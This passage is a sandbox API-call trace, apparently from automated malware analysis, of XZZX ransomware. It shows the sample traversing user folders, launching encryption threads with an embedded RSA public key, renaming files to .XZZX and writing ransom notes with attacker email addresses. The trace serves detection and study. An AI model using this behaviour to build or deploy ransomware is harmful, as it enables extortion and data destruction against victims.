KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0113.168] lstrcpyW (in: lpString1=0x17cf1c, lpString2="AFA4CBC047178B40A7E7AA8D4B2F6F88.XZZX" | out: lpString1="AFA4CBC047178B40A7E7AA8D4B2F6F88.XZZX") returned="AFA4CBC047178B40A7E7AA8D4B2F6F88.XZZX" [0113.168] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\" [0113.168] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x4c0 [0113.169] Sleep (dwMilliseconds=0x96) [0113.324] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0113.324] lstrcmpW (lpString1="Desktop.lnk", lpString2="..") returned 1 [0113.324] lstrcmpW (lpString1="Desktop.lnk", lpString2=".") returned 1 [0113.324] StrStrW (lpFirst="Desktop.lnk", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0113.324] StrStrW (lpFirst="Desktop.lnk", lpSrch="ntldr") returned 0x0 [0113.324] StrStrW (lpFirst="Desktop.lnk", lpSrch="NTLDR") returned 0x0 [0113.324] StrStrW (lpFirst="Desktop.lnk", lpSrch="NTDETECT.COM") returned 0x0 [0113.324] StrStrW (lpFirst="Desktop.lnk", lpSrch="ntdetect.com") returned 0x0 [0113.324] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\", lpSrch="Desktop") returned 0x0 [0113.324] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\", lpSrch="DESKTOP") returned 0x0 [0113.324] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\") returned 40 [0113.324] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0113.324] lstrcpyW (in: lpString1=0x17cf1c, lpString2="Desktop.lnk" | out: lpString1="Desktop.lnk") returned="Desktop.lnk" [0113.324] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\" [0113.324] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x4c4 [0113.325] Sleep (dwMilliseconds=0x96) [0113.490] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0113.490] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2="..") returned 1 [0113.490] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2=".") returned 1 [0113.491] StrStrW (lpFirst="_HELP_INSTRUCTION.TXT", lpSrch="_HELP_INSTRUCTION.TXT") returned="_HELP_INSTRUCTION.TXT" [0113.491] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0 [0113.491] FindClose (in: hFindFile=0x3a55d0 | out: hFindFile=0x3a55d0) returned 1 [0113.491] FindClose (in: hFindFile=0x3a55d0 | out: hFindFile=0x3a55d0) returned 0 [0113.491] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links" [0113.491] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\*.*" [0113.491] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\", lpSrch="Desktop") returned 0x0 [0113.491] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\", lpSrch="DESKTOP") returned 0x0 [0113.491] SetErrorMode (uMode=0x1) returned 0x1 [0113.491] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\_HELP_INSTRUCTION.TXT") returned 57 [0113.491] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0113.491] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0113.492] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0x4cc) returned 0x0 [0113.492] RegQueryValueExW (in: hKey=0x4cc, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3cbb8a0, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x3cbb8a0*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0113.492] RegCloseKey (hKey=0x4cc) returned 0x0 [0113.492] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0113.492] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0113.492] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4cc [0113.493] CloseHandle (hObject=0x4cc) returned 1 [0113.493] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x3a55d0 [0113.493] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links") returned="Links" [0113.493] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Links" | out: lpString1="Links") returned="Links" [0113.493] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0113.493] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0113.493] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0113.493] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0113.493] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0113.493] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0113.493] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0113.493] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0113.493] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0113.493] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0 [0113.493] FindClose (in: hFindFile=0x3a55d0 | out: hFindFile=0x3a55d0) returned 1 [0113.493] FindClose (in: hFindFile=0x3a55d0 | out: hFindFile=0x3a55d0) returned 0 [0113.494] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0113.494] lstrcmpW (lpString1="Local Settings", lpString2="..") returned 1 [0113.494] lstrcmpW (lpString1="Local Settings", lpString2=".") returned 1 [0113.494] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz" [0113.494] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0113.494] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="Local Settings" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings" [0113.494] SetErrorMode (uMode=0x1) returned 0x1 [0113.494] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings" [0113.494] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\" [0113.494] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\" [0113.494] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\*.*" [0113.494] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0xffffffff [0113.494] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0113.494] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings" [0113.494] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\*.*" [0113.494] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\", lpSrch="Desktop") returned 0x0 [0113.494] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\", lpSrch="DESKTOP") returned 0x0 [0113.494] SetErrorMode (uMode=0x1) returned 0x1 [0113.494] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\_HELP_INSTRUCTION.TXT") returned 66 [0113.495] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0113.495] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0113.495] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0x4d0) returned 0x0 [0113.495] RegQueryValueExW (in: hKey=0x4d0, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3cbbad0, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x3cbbad0*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0113.495] RegCloseKey (hKey=0x4d0) returned 0x0 [0113.495] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0113.495] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0113.495] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4d0 [0113.496] CloseHandle (hObject=0x4d0) returned 1 [0113.496] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0xffffffff [0113.496] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0113.496] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0113.496] lstrcmpW (lpString1="Music", lpString2="..") returned 1 [0113.496] lstrcmpW (lpString1="Music", lpString2=".") returned 1 [0113.496] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz" [0113.496] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0113.496] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="Music" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music" [0113.497] SetErrorMode (uMode=0x1) returned 0x1 [0113.497] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music" [0113.497] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" [0113.497] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" [0113.497] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*.*" [0113.497] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x3a55d0 [0113.497] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music") returned="Music" [0113.497] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Music" | out: lpString1="Music") returned="Music" [0113.497] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0113.497] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0113.497] lstrcmpW (lpString1="129DFDC608A49A7CBFF35CF70D217EC4.XZZX", lpString2="..") returned 1 [0113.497] lstrcmpW (lpString1="129DFDC608A49A7CBFF35CF70D217EC4.XZZX", lpString2=".") returned 1 [0113.497] StrStrW (lpFirst="129DFDC608A49A7CBFF35CF70D217EC4.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0113.497] StrStrW (lpFirst="129DFDC608A49A7CBFF35CF70D217EC4.XZZX", lpSrch="ntldr") returned 0x0 [0113.497] StrStrW (lpFirst="129DFDC608A49A7CBFF35CF70D217EC4.XZZX", lpSrch="NTLDR") returned 0x0 [0113.497] StrStrW (lpFirst="129DFDC608A49A7CBFF35CF70D217EC4.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0113.497] StrStrW (lpFirst="129DFDC608A49A7CBFF35CF70D217EC4.XZZX", lpSrch="ntdetect.com") returned 0x0 [0113.497] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpSrch="Desktop") returned 0x0 [0113.497] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpSrch="DESKTOP") returned 0x0 [0113.497] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned 40 [0113.497] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0113.497] lstrcpyW (in: lpString1=0x17cf1c, lpString2="129DFDC608A49A7CBFF35CF70D217EC4.XZZX" | out: lpString1="129DFDC608A49A7CBFF35CF70D217EC4.XZZX") returned="129DFDC608A49A7CBFF35CF70D217EC4.XZZX" [0113.497] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" [0113.498] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x4c8 [0113.498] Sleep (dwMilliseconds=0x96) [0113.651] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0113.651] lstrcmpW (lpString1="2_r9zrnyCzzJ.mp3", lpString2="..") returned 1 [0113.651] lstrcmpW (lpString1="2_r9zrnyCzzJ.mp3", lpString2=".") returned 1 [0113.652] StrStrW (lpFirst="2_r9zrnyCzzJ.mp3", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0113.652] StrStrW (lpFirst="2_r9zrnyCzzJ.mp3", lpSrch="ntldr") returned 0x0 [0113.652] StrStrW (lpFirst="2_r9zrnyCzzJ.mp3", lpSrch="NTLDR") returned 0x0 [0113.652] StrStrW (lpFirst="2_r9zrnyCzzJ.mp3", lpSrch="NTDETECT.COM") returned 0x0 [0113.652] StrStrW (lpFirst="2_r9zrnyCzzJ.mp3", lpSrch="ntdetect.com") returned 0x0 [0113.652] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpSrch="Desktop") returned 0x0 [0113.652] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpSrch="DESKTOP") returned 0x0 [0113.652] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned 40 [0113.652] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0113.652] lstrcpyW (in: lpString1=0x17cf1c, lpString2="2_r9zrnyCzzJ.mp3" | out: lpString1="2_r9zrnyCzzJ.mp3") returned="2_r9zrnyCzzJ.mp3" [0113.652] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" [0113.652] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x4d4 [0113.652] Sleep (dwMilliseconds=0x96) [0113.839] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0113.839] lstrcmpW (lpString1="35A8A5603BE70712A81D33D040A3EB5A.XZZX", lpString2="..") returned 1 [0113.839] lstrcmpW (lpString1="35A8A5603BE70712A81D33D040A3EB5A.XZZX", lpString2=".") returned 1 [0113.840] StrStrW (lpFirst="35A8A5603BE70712A81D33D040A3EB5A.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0113.840] StrStrW (lpFirst="35A8A5603BE70712A81D33D040A3EB5A.XZZX", lpSrch="ntldr") returned 0x0 [0113.840] StrStrW (lpFirst="35A8A5603BE70712A81D33D040A3EB5A.XZZX", lpSrch="NTLDR") returned 0x0 [0113.840] StrStrW (lpFirst="35A8A5603BE70712A81D33D040A3EB5A.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0113.840] StrStrW (lpFirst="35A8A5603BE70712A81D33D040A3EB5A.XZZX", lpSrch="ntdetect.com") returned 0x0 [0113.840] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpSrch="Desktop") returned 0x0 